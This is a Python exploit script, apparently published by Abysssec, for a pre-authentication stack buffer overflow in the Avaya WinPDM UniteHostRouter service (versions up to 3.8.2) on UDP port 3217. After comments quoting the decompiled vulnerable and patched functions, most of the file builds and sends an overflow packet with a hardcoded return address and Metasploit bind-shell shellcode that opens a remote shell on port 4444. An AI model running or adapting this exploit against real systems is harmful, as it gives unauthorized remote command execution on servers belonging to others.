133 lines
No EOL
4.8 KiB
Python
Executable file
133 lines
No EOL
4.8 KiB
Python
Executable file
# Abysssec Public Exploit
|
|
# more info www.abysssec.com
|
|
# Avaya WinPDM UniteHostRouter <= 3.8.2 Remote Pre-Auth Command Execute
|
|
|
|
#A boundary error in the Unite Host Router service (UniteHostRouter.exe)
|
|
#when processing certain requests can be exploited to cause a stack-based buffer
|
|
#overflow via an overly long string in the "To:" field sent to UDP port 3217.
|
|
'''
|
|
|
|
|
|
signed int __cdecl sub_403160(const char *Str, void *a2)
|
|
{
|
|
char *v2;
|
|
char *v3;
|
|
const void *v4;
|
|
char *v5;
|
|
unsigned int v6;
|
|
signed int result;
|
|
|
|
v2 = strpbrk(Str, "\n\r");
|
|
v3 = strpbrk(Str, "/\n\r");
|
|
if ( v3 >= v2 || (v4 = v3 + 1, v5 = strpbrk(v3 + 1, ":/? \n\r"), v5 > v2) )
|
|
{
|
|
result = 0;
|
|
}
|
|
else
|
|
{
|
|
v6 = v5 - v4;
|
|
memcpy(a2, v4, v6); // vulnerable memcpy
|
|
*((_BYTE *)a2 + v6) = 0;
|
|
result = 1;
|
|
}
|
|
return result;
|
|
}
|
|
|
|
|
|
|
|
signed int __cdecl sub_403160_patched(const char *Str, void *a2)
|
|
{
|
|
char *v2;
|
|
char *v3;
|
|
const void *v4;
|
|
char *v5;
|
|
unsigned int v6;
|
|
signed int result;
|
|
|
|
v2 = strpbrk(Str, "\n\r");
|
|
if ( v2
|
|
&& (v3 = strpbrk(Str, "/\n\r")) != 0
|
|
&& v3 < v2
|
|
&& (v4 = v3 + 1, (v5 = strpbrk(v3 + 1, ":/? \n\r")) != 0)
|
|
&& v5 <= v2
|
|
&& (v6 = v5 - v4, (signed int)v6 <= 256) ) // patched by checking <= 256
|
|
{
|
|
memcpy(a2, v4, v6);
|
|
*((_BYTE *)a2 + v6) = 0;
|
|
result = 1;
|
|
}
|
|
else
|
|
{
|
|
result = 0;
|
|
}
|
|
return result;
|
|
}
|
|
|
|
|
|
'''
|
|
|
|
from socket import socket, AF_INET, SOCK_DGRAM
|
|
|
|
data = '\x55\x54\x50\x2f\x31' # Protocol
|
|
data +=' To: 127.0.0.1'
|
|
data+= ' /'+"A"*260
|
|
data+= "\xFB\xF8\xAB\x71" # 71ABF8FB call esp W32_SOCK.dll
|
|
|
|
# win32_bind - EXITFUNC=thread LPORT=4444 Size=717 Encoder=PexAlphaNum
|
|
# http://metasploit.com
|
|
|
|
data += ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
|
|
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
|
|
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
|
|
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
|
|
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
|
|
"\x4f\x44\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
|
|
"\x4e\x56\x46\x32\x46\x32\x4b\x38\x45\x44\x4e\x43\x4b\x58\x4e\x47"
|
|
"\x45\x50\x4a\x57\x41\x50\x4f\x4e\x4b\x38\x4f\x34\x4a\x41\x4b\x58"
|
|
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x43\x4e\x42\x53\x49\x54\x4b\x38"
|
|
"\x46\x53\x4b\x58\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x39\x4e\x4a"
|
|
"\x46\x58\x42\x4c\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x30"
|
|
"\x44\x4c\x4b\x4e\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x42\x45\x57"
|
|
"\x43\x4e\x4b\x58\x4f\x55\x46\x52\x41\x50\x4b\x4e\x48\x36\x4b\x58"
|
|
"\x4e\x50\x4b\x34\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x43\x30"
|
|
"\x4e\x52\x4b\x48\x49\x38\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c"
|
|
"\x41\x43\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x33\x4b\x58\x42\x44"
|
|
"\x4e\x50\x4b\x38\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x54\x4a\x50"
|
|
"\x50\x35\x4a\x46\x50\x58\x50\x44\x50\x50\x4e\x4e\x42\x35\x4f\x4f"
|
|
"\x48\x4d\x41\x53\x4b\x4d\x48\x36\x43\x55\x48\x56\x4a\x36\x43\x33"
|
|
"\x44\x33\x4a\x56\x47\x47\x43\x47\x44\x33\x4f\x55\x46\x55\x4f\x4f"
|
|
"\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x53\x42\x45\x4f\x4f"
|
|
"\x48\x4d\x4f\x35\x49\x48\x45\x4e\x48\x56\x41\x48\x4d\x4e\x4a\x50"
|
|
"\x44\x30\x45\x55\x4c\x46\x44\x50\x4f\x4f\x42\x4d\x4a\x36\x49\x4d"
|
|
"\x49\x50\x45\x4f\x4d\x4a\x47\x55\x4f\x4f\x48\x4d\x43\x45\x43\x45"
|
|
"\x43\x55\x43\x55\x43\x45\x43\x34\x43\x45\x43\x34\x43\x35\x4f\x4f"
|
|
"\x42\x4d\x48\x56\x4a\x56\x41\x41\x4e\x35\x48\x36\x43\x35\x49\x38"
|
|
"\x41\x4e\x45\x49\x4a\x46\x46\x4a\x4c\x51\x42\x57\x47\x4c\x47\x55"
|
|
"\x4f\x4f\x48\x4d\x4c\x36\x42\x31\x41\x45\x45\x35\x4f\x4f\x42\x4d"
|
|
"\x4a\x36\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x47\x55\x4f\x4f\x48\x4d"
|
|
"\x43\x35\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x45\x4e\x49\x44\x48\x38"
|
|
"\x49\x54\x47\x55\x4f\x4f\x48\x4d\x42\x55\x46\x35\x46\x45\x45\x35"
|
|
"\x4f\x4f\x42\x4d\x43\x49\x4a\x56\x47\x4e\x49\x37\x48\x4c\x49\x37"
|
|
"\x47\x45\x4f\x4f\x48\x4d\x45\x55\x4f\x4f\x42\x4d\x48\x36\x4c\x56"
|
|
"\x46\x46\x48\x36\x4a\x46\x43\x56\x4d\x56\x49\x38\x45\x4e\x4c\x56"
|
|
"\x42\x55\x49\x55\x49\x52\x4e\x4c\x49\x48\x47\x4e\x4c\x36\x46\x54"
|
|
"\x49\x58\x44\x4e\x41\x43\x42\x4c\x43\x4f\x4c\x4a\x50\x4f\x44\x54"
|
|
"\x4d\x32\x50\x4f\x44\x54\x4e\x52\x43\x49\x4d\x58\x4c\x47\x4a\x53"
|
|
"\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46\x44\x57\x50\x4f\x43\x4b\x48\x51"
|
|
"\x4f\x4f\x45\x57\x46\x54\x4f\x4f\x48\x4d\x4b\x45\x47\x35\x44\x35"
|
|
"\x41\x35\x41\x55\x41\x35\x4c\x46\x41\x50\x41\x35\x41\x45\x45\x35"
|
|
"\x41\x45\x4f\x4f\x42\x4d\x4a\x56\x4d\x4a\x49\x4d\x45\x30\x50\x4c"
|
|
"\x43\x35\x4f\x4f\x48\x4d\x4c\x56\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f"
|
|
"\x42\x4d\x4b\x58\x47\x45\x4e\x4f\x43\x38\x46\x4c\x46\x36\x4f\x4f"
|
|
"\x48\x4d\x44\x55\x4f\x4f\x42\x4d\x4a\x36\x4f\x4e\x50\x4c\x42\x4e"
|
|
"\x42\x36\x43\x55\x4f\x4f\x48\x4d\x4f\x4f\x42\x4d\x5a")
|
|
|
|
data += '\r\n\r\n' #\n\n
|
|
|
|
port = 3217
|
|
hostname = '192.168.171.129'
|
|
udp = socket(AF_INET,SOCK_DGRAM)
|
|
udp.sendto(data, (hostname, port))
|
|
|
|
print "Send malicius packet\n"
|
|
print "You Should Got a shell at %s 4444" % hostname |